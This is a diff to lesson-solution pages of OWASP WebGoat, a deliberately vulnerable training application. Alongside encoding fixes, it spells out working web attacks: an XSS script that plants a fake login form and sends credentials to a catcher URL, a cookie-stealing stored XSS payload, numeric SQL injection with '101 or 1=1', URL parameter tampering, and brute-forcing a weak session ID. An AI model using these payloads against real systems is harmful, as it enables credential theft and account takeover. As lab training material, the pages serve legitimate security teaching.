+&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
+User Name = &quot; + document.forms[0].user.value + &quot;Password = &quot; +  document.forms[0].pass.value); 
+XSSImage=new Image; XSSImage.src=&quot;http://localhost/WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+
+document.forms[0].user.value + &quot;&amp;password=&quot; + document.forms[0].pass.value + &quot;&quot;;}
+&lt;/script&gt;
+</p>
+<p>
+This script will read the input from the form and send it to the catcher of WebGoat.<br/><br/>
+The last step is to put things together. Add a Button to the form which
+calls the script. You can reach this wicht the onclick="myFunction" handler.
+<p>
+The final String looks like this:<br/>
+&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen.
+User Name = &quot; + document.forms[0].user.value + &quot;Password = &quot; +  document.forms[0].pass.value); 
+XSSImage=new Image; XSSImage.src=&quot;http://localhost/WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+
+document.forms[0].user.value + &quot;&amp;password=&quot; + document.forms[0].pass.value + &quot;&quot;;}
+&lt;/script&gt;&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H3
+&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; 
+name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; 
+name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; 
+value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;
+</p>
+Search for this String and you will see a form asking for your username and password.
+Fill in these fields and click on the Login Button.
+</body>
+</html>
+

webgoat/main/project/WebContent/lesson_solutions/RemoteAdminFlaw.html

@@ -590,13 +590,13 @@ style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Append <i
 style='mso-bidi-font-style:normal'>&amp;admin=true</i> to the URL in the
-browser and hit <EFBFBD>Enter<EFBFBD><o:p></o:p></span></p>
+browser and hit "Enter"<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Open the menu
-<EFBFBD>Admin functions<EFBFBD> and notice that you have additional menu options like
-<EFBFBD>Database Dump<EFBFBD>, <EFBFBD>User Information<EFBFBD> and <EFBFBD>Product Information<EFBFBD>.<o:p></o:p></span></p>
+"Admin functions" and notice that you have additional menu options like
+"Database Dump", "User Information" and "Product Information".<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
@@ -618,8 +618,8 @@ style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Clicking on
-<EFBFBD>User Information<EFBFBD> will not work. This is because the URL behind <EFBFBD>User
-Information<EFBFBD> is <a href="http://localhost/WebGoat/attack?Screen=71&amp;menu=10">http://localhost/WebGoat/attack?Screen=71&amp;menu=10</a>
+"User Information" will not work. This is because the URL behind "User
+Information" is <a href="http://localhost/WebGoat/attack?Screen=71&amp;menu=10">http://localhost/WebGoat/attack?Screen=71&amp;menu=10</a>
 does not contain the parameter admin=true. Rewrite the URL to become <a
 href="http://localhost/WebGoat/attack?Screen=71&amp;menu=10&amp;admin=true">http://localhost/WebGoat/attack?Screen=71&amp;menu=10&amp;admin=true</a><o:p></o:p></span></p>
 

webgoat/main/project/WebContent/lesson_solutions/SilentTransactions.html

@@ -627,7 +627,7 @@ attacks works:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></
 silently processes transactions using a single submission is dangerous to the
 client. For example, if a normal web application allows a simple URL
 submission, a preset session attack will allow the attacker to complete a
-transaction without the user<EFBFBD>s authorization. In Ajax, it gets worse: the
+transaction without the user's authorization. In Ajax, it gets worse: the
 transaction is silent; it happens with no user feedback on the page, so an
 injected attack script may be able to steal money from the client without
 authorization.<o:p></o:p></span></p>

webgoat/main/project/WebContent/lesson_solutions/SoapRequest.html

@@ -703,7 +703,7 @@ field-end'></span><![endif]--> - Lesson 21</p>
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Click on the
-URL <EFBFBD>WebGoat WSDL<EFBFBD> to examine the Webservices Description Language file.<o:p></o:p></span></p>
+URL "WebGoat WSDL" to examine the Webservices Description Language file.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
@@ -746,7 +746,7 @@ field-end'></span><![endif]--> Enter the ID<span style='font-family:"Arial","san
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>For the next
 question the getFirstNameRequest method uses an int as parameter type. Enter
-int and click <EFBFBD>Submit<EFBFBD>.<o:p></o:p></span></p>
+int and click "Submit".<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 

webgoat/main/project/WebContent/lesson_solutions/SqlNumericInjection.html

@@ -616,38 +616,11 @@ style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
-yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600"
- o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f"
- stroked="f">
- <v:stroke joinstyle="miter"/>
- <v:formulas>
-  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
-  <v:f eqn="sum @0 1 0"/>
-  <v:f eqn="sum 0 0 @1"/>
-  <v:f eqn="prod @2 1 2"/>
-  <v:f eqn="prod @3 21600 pixelWidth"/>
-  <v:f eqn="prod @3 21600 pixelHeight"/>
-  <v:f eqn="sum @0 0 1"/>
-  <v:f eqn="prod @6 1 2"/>
-  <v:f eqn="prod @7 21600 pixelWidth"/>
-  <v:f eqn="sum @8 21600 0"/>
-  <v:f eqn="prod @7 21600 pixelHeight"/>
-  <v:f eqn="sum @10 21600 0"/>
- </v:formulas>
- <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
- <o:lock v:ext="edit" aspectratio="t"/>
-</v:shapetype><v:shape id="Picture_x0020_1509" o:spid="_x0000_i1027" type="#_x0000_t75"
- style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
- <v:imagedata src="/WebGoat/lesson_solutions/SqlNumericInjection_files/image001.png" o:title=""/>
-</v:shape><![endif]--><![if !vml]><img width=640 height=369
-src="/WebGoat/lesson_solutions/SqlNumericInjection_files/image002.jpg" v:shapes="Picture_x0020_1509"><![endif]></span><span
-style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The
-application is taking your input and inserting it at the end of a pre-formed
+application is taking the input from the select box and inserts it at the end of a pre-formed
 SQL command.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Compound SQL
@@ -657,46 +630,40 @@ Try appending a SQL statement that always resolves to true.<o:p></o:p></span></p
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This is the
-query: SELECT * FROM user_data WHERE userid = 101<o:p></o:p></span></p>
+query: SELECT * FROM weather_data WHERE station = 101<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>What happens
-if you insert 101 or 1=1?<o:p></o:p></span></p>
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Intercept the post request with WebScarab and replace 101 with 101 or 1=1!<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+<center>
+<img src = "/WebGoat/lesson_solutions/SqlNumericInjection_files/numericinjection.png" width=350px>
 
-<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
-"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1510"
- o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276.75pt;
- visibility:visible;mso-wrap-style:square'>
- <v:imagedata src="/WebGoat/lesson_solutions/SqlNumericInjection_files/image003.png" o:title=""/>
-</v:shape><![endif]--><![if !vml]><img width=640 height=369
-src="/WebGoat/lesson_solutions/SqlNumericInjection_files/image004.jpg" v:shapes="Picture_x0020_1510"><![endif]></span></p>
 
 <p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
 field-begin'></span><span style='mso-spacerun:yes'><3E></span>SEQ Figure \* ARABIC
 <span style='mso-element:field-separator'></span><![endif]--><span
 style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
-field-end'></span><![endif]--> Numeric SQL Injection<span style='font-family:
+field-end'></span><![endif]--> Intercepted Request with WebScarab<span style='font-family:
 "Arial","sans-serif"'><o:p></o:p></span></p>
+</center>
+<br/>
+<br/>
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>As the SQL Statement is true for every station you get
+a list of all stations:<o:p></o:p></span></p>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+<center>
+<img src = "/WebGoat/lesson_solutions/SqlNumericInjection_files/numericinjection_solved.png" width=350px>
 
-<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
-"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1511"
- o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276.75pt;
- visibility:visible;mso-wrap-style:square'>
- <v:imagedata src="/WebGoat/lesson_solutions/SqlNumericInjection_files/image005.png" o:title=""/>
-</v:shape><![endif]--><![if !vml]><img width=640 height=369
-src="/WebGoat/lesson_solutions/SqlNumericInjection_files/image006.jpg" v:shapes="Picture_x0020_1511"><![endif]></span></p>
 
 <p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
 field-begin'></span><span style='mso-spacerun:yes'><3E></span>SEQ Figure \* ARABIC
 <span style='mso-element:field-separator'></span><![endif]--><span
 style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
-field-end'></span><![endif]--> Lesson 17 Completed<span style='font-family:
+field-end'></span><![endif]--> All stations are visible<span style='font-family:
 "Arial","sans-serif"'><o:p></o:p></span></p>
+</center>
 
 <p class=MsoNormal><o:p>&nbsp;</o:p></p>
 

webgoat/main/project/WebContent/lesson_solutions/StoredXss.html

@@ -651,9 +651,9 @@ style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
 <p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
 style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
 
-<p class=MsoNormal>Enter this: &lt;script language=<EFBFBD>javascript<EFBFBD>
-type=<EFBFBD>text/javascript<EFBFBD>&gt;alert(<EFBFBD>Ha Ha Ha<EFBFBD>);&lt;/script&gt; in the message text
-box.</p>
+<p class=MsoNormal>Enter this: &lt;script language="javascript"
+type="text/javascript"&gt;alert("Ha Ha Ha");&lt;/script&gt; in the message text
+box.<br><br></p>
 
 <p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
 "Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1340"
@@ -683,9 +683,15 @@ src="/WebGoat/lesson_solutions/StoredXSS_files/image009.jpg" v:shapes="Picture_x
 field-begin'></span><span style='mso-spacerun:yes'><3E></span>SEQ Figure \* ARABIC
 <span style='mso-element:field-separator'></span><![endif]--><span
 style='mso-no-proof:yes'>3</span><!--[if supportFields]><span style='mso-element:
-field-end'></span><![endif]--> Lesson 14 Completed<span style='font-family:
+field-end'></span><![endif]--> Lesson 14 nearly completed<span style='font-family:
 "Arial","sans-serif"'><o:p></o:p></span></p>
 
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal>Now enter this:<font color="ff0000"> &lt;script language="javascript"
+type="text/javascript"&gt;alert(document.cookie);&lt;/script&gt;</font> in the message text
+box. You will get your SessionId in a popup.<br><br></p>
+
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal><o:p>&nbsp;</o:p></p>

webgoat/main/project/WebContent/lesson_solutions/ThreadSafetyProblem.html

@@ -591,7 +591,7 @@ style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Open a new
 browser window by pressing CTRL-N. Position the window so that you see both
-input fields. Enter user name <EFBFBD>dave<EFBFBD> in the left window and user name <EFBFBD>jeff<EFBFBD> in
+input fields. Enter user name "dave" in the left window and user name "jeff" in
 the right window.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Click very

webgoat/main/project/WebContent/lesson_solutions/UncheckedEmail.html

@@ -551,7 +551,7 @@ should be able to send an obnoxious email message.<o:p></o:p></span></p>
 style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Type a
-malicious script like &lt;script&gt;alert(<EFBFBD>XSS<EFBFBD>)&lt;/script&gt; and click Send!<o:p></o:p></span></p>
+malicious script like &lt;script&gt;alert("XSS")&lt;/script&gt; and click Send!<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
@@ -613,7 +613,7 @@ field-end'></span><![endif]--> Part 1 completed<span style='font-family:"Arial",
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The second
 part of this lesson is to send a mail to a friend from OWASP. This can be
 accomplished by intercepting the request with WebScarab and changing the hidden
-field <EFBFBD>to<EFBFBD> from <a href="mailto:webgoat.admin@owasp.org">webgoat.admin@owasp.org</a>
+field "to" from <a href="mailto:webgoat.admin@owasp.org">webgoat.admin@owasp.org</a>
 to <a href="mailto:bill.gates@microsoft.com">bill.gates@microsoft.com</a><o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>

webgoat/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie.html

@@ -645,8 +645,8 @@ should be able to bypass the authentication check.<o:p></o:p></span></p>
 <p class=MsoNormal><o:p>&nbsp;</o:p></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Make sure
-that you have <EFBFBD>Show Cookies<EFBFBD> enabled in WebGoat. And you need to disable the
-feature <EFBFBD>Inject know cookies into requests<EFBFBD> in WebScarab otherwise WebScarab
+that you have "Show Cookies" enabled in WebGoat. And you need to disable the
+feature "Inject know cookies into requests" in WebScarab otherwise WebScarab
 will always inject your old cookie and not the new cookie.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@@ -726,7 +726,7 @@ field-end'></span><![endif]--> Logged on as webgoat</p>
 <p class=MsoNormal><o:p>&nbsp;</o:p></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Hit
-<EFBFBD>Refresh<EFBFBD>. This refresh will show our AuthCookie. And you are now authenticated
+"Refresh". This refresh will show our AuthCookie. And you are now authenticated
 using this cookie and not with parameters like above.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@@ -782,7 +782,7 @@ field-end'></span><![endif]--> Logged on as aspect<span style='font-family:
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Hit <EFBFBD>Refresh<EFBFBD>
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Hit "Refresh"
 to see the new cookie.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>

webgoat/main/project/WebContent/lesson_solutions/WeakSessionID.html

@@ -662,13 +662,13 @@ style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The easiest
-way to complete this lesson is to use WebScarab<EFBFBD>s Session ID Analysis.<o:p></o:p></span></p>
+way to complete this lesson is to use WebScarab's Session ID Analysis.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Go to
-WebScarab and click on the button <EFBFBD>SessionID Analysis<EFBFBD>. Select the last POST
-request from the <EFBFBD>Previous requests<EFBFBD> drop-down box.<o:p></o:p></span></p>
+WebScarab and click on the button "SessionID Analysis". Select the last POST
+request from the "Previous requests" drop-down box.<o:p></o:p></span></p>
 
 <p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
 "Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_786"
@@ -688,7 +688,7 @@ style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>To make sure
-that WebScarab is able to fetch the WEAKID cookie, you need to click the <EFBFBD>Test<EFBFBD>
+that WebScarab is able to fetch the WEAKID cookie, you need to click the "Test"
 button on the bottom of the screen. A pop-up window must be shown like below.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@@ -713,7 +713,7 @@ style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>If you don<6F>t
 have a pop-up window with the Extracted Sessionids, you must edit the Request.
 You must delete the WEAKID value from the request. Without this cookie value,
-WebGoat will return a HTTP Header <EFBFBD>Set-Cookie: WEAKID=value<EFBFBD> so WebScarab
+WebGoat will return a HTTP Header "Set-Cookie: WEAKID=value" so WebScarab
 learns about this value.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@@ -721,8 +721,8 @@ learns about this value.<o:p></o:p></span></p>
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Fetch 50
-samples and examine the results. Enter <EFBFBD>50<EFBFBD> in the <EFBFBD>Samples<EFBFBD> window and click
-the button <EFBFBD>Fetch<EFBFBD>. You will not see any information about progress.<o:p></o:p></span></p>
+samples and examine the results. Enter "50" in the "Samples" window and click
+the button "Fetch". You will not see any information about progress.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
@@ -738,7 +738,7 @@ style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Now you need
-to go to the tab <EFBFBD>Analysis<EFBFBD>.<o:p></o:p></span></p>
+to go to the tab "Analysis".<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
@@ -753,7 +753,7 @@ style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>In the <EFBFBD>Analysis<EFBFBD>
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>In the "Analysis"
 pane you see nothing. <o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
@@ -793,7 +793,9 @@ there is sometimes a gap in the first value of the WEAKID, skipping with 1. The
 value that is missing is the value that you need to know to log on. Now you
 only need to calculate the timestamp. This can be brute-forced using Crowbar.
 You know the previous timestamp and the next timestamp so you have a start and
-end value.<o:p></o:p></span></p>
+end value.<br>
+You can download Crowbar for free: <a href="http://www.sensepost.com/research/crowbar/" target="_blank">http://www.sensepost.com/research/crowbar/</a>
+<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
@@ -829,35 +831,26 @@ field-end'></span><![endif]--> Crowbar<span style='font-family:"Arial","sans-ser
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
-
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
-
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Change target
-to localhost and the port to 80.<o:p></o:p></span></p>
+to localhost and adjust the port.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Create a Base
-response. Make sure that you see <EFBFBD>How to hijack a session<EFBFBD> in the middle
+response. Make sure that you see "How to hijack a session" in the middle
 window.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Insert ##1##
-in the WEAKID parameter where you want to brute-force the value. Start the
-first loop at 363093, the last digits of the last cookie before the
+in the WEAKID parameter where you want to brute-force the value and be aware, that the first part of the WEAKID is the one we are searching for (16936).
+The WEAKID in Crowbar lookes like this: Cookie: JSESSIONID=...; WEAKID=1693<font color="ff0000">6</font>-1163685<font color="ff0000">##1##</font>;<br>
+Start the first loop at 363093, the last digits of the last cookie before the
 authentication cookie and 363203, the first cookie after the authentication
-cookie. We have to brute-force these values, but we are sure that they lie
+cookie. You have to enter these two values in the Parameter1 fields. We have to brute-force these values, but we are sure that they lie
 between these two boundaries.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Examine the
-results until you see a different fuzzy logic value (the blue line </span><span
-style='font-family:Wingdings;mso-ascii-font-family:Arial;mso-hansi-font-family:
-Arial;mso-bidi-font-family:Arial;mso-char-type:symbol;mso-symbol-font-family:
-Wingdings'><span style='mso-char-type:symbol;mso-symbol-font-family:Wingdings'>J</span></span><span
-style='font-family:"Arial","sans-serif"'>), right-click it and click on <20>Show
-reply<EFBFBD>.<o:p></o:p></span></p>
+results until you see a different fuzzy logic value (the blue line in Figure 3), right-click it and click on "Show
+reply".<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 

webgoat/main/project/WebContent/lesson_solutions/WsSAXInjection.html

@@ -684,7 +684,7 @@ user-ID then 101 (which is your user-ID)<o:p></o:p></span></p>
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>When you fill
-out a password and click on <EFBFBD>Go!<EFBFBD> the following XML request will be created,
+out a password and click on "Go!" the following XML request will be created,
 submit and parsed by the SAX parser:<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@@ -824,8 +824,8 @@ WebScarab and replace the parameter password with the payload.<o:p></o:p></span>
 style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
-style='font-family:"Arial","sans-serif"'>Enter a password <EFBFBD>test<EFBFBD> and click
-<EFBFBD>Go!<EFBFBD>. <o:p></o:p></span></p>
+style='font-family:"Arial","sans-serif"'>Enter a password 'test' and click
+"Go!". <o:p></o:p></span></p>
 
 <p class=MsoNormal style='page-break-after:avoid;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
 style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape

webgoat/main/project/WebContent/lesson_solutions/WsSqlInjection.html

@@ -626,7 +626,7 @@ you believe you have suceeded, refresh the page and look for the 'green star'.<o
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This lesson
 can be solved easily by using a web services tool called SOAPUI. But here you
-will only use WebScarab. Go in WebScarab to the tab <EFBFBD>Web Services<EFBFBD>. You will
+will only use WebScarab. Go in WebScarab to the tab "Web Services". You will
 see a history of invoked web services or WSDL files.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@@ -675,8 +675,9 @@ WebGoat WSDL file for this lesson (WsSqlInjection?WSDL) in a new window.<o:p></o
 you can select this WSDL from the top drop-down box. And WebScarab will parse
 the XML file so you can select the operations to invoke. Then you can enter a
 value for the parameters used to invoke the operation. For example fill out the
-integer 101 for the ID value and click <EFBFBD>Execute<EFBFBD>. WebScarab will pop-up a basic
-authentication window. Enter guest/guest and click <EFBFBD>Ok<EFBFBD>.<o:p></o:p></span></p>
+integer 101 for the ID value and click "Execute". WebScarab will pop-up a basic
+authentication window. Enter username:guest, password:guest and host:localhost then click "Ok".
+If the pop-up does not appear you have to go to "Tools" > "Credentials". There you should activate "Ask when required". <o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
@@ -744,7 +745,7 @@ field-end'></span><![endif]--> All the credit cards<span style='font-family:
 
 <p class=MsoNormal><b style='mso-bidi-font-weight:normal'><u><span
 style='font-family:"Arial","sans-serif"'>Remark:</span></u></b><span
-style='font-family:"Arial","sans-serif"'> when you don<EFBFBD>t get any responses you
+style='font-family:"Arial","sans-serif"'> when you don't get any responses you
 might want to select the service and operation again from the drop-down box. A nice
 feature here would be the ability to make a raw SOAP request.<o:p></o:p></span></p>
 

webgoat/main/project/WebContent/lesson_solutions/XMLInjection.html

@@ -734,44 +734,43 @@ field-end'></span><![endif]--> Intercepted HTTP Response</p>
 <p class=MsoNormal><o:p>&nbsp;</o:p></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>From the HTTP Response you can see that you get back an XML
-message with the rewards for your account:</p></span>
+message with the rewards for your account:</span></p>
 
 <p class=MsoNormal><o:p>&nbsp;</o:p></p>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;root&gt;</p></span>
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;root&gt;</span></p>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;reward&gt;WebGoat t-shirt 20 Pts&lt;/reward&gt;</p></span>
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;reward&gt;WebGoat t-shirt 20 Pts&lt;/reward&gt;</span></p>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;reward&gt;WebGoat Secure Kettle 50 Pts&lt;/reward&gt;</p></span>
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;reward&gt;WebGoat Secure Kettle 50 Pts&lt;/reward&gt;</span></p>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;reward&gt;WebGoat Mug 30 Pts&lt;/reward&gt;</p></span>
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;reward&gt;WebGoat Mug 30 Pts&lt;/reward&gt;</span></p>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;/root&gt;</p></span>
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;/root&gt;</span></p>
 
 <p class=MsoNormal><o:p>&nbsp;</o:p></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>What happens if you intercept this HTTP Response and update
-the XML message to become:</p></span>
+the XML message to become:</span></p>
 
 <p class=MsoNormal><o:p>&nbsp;</o:p></p>
 
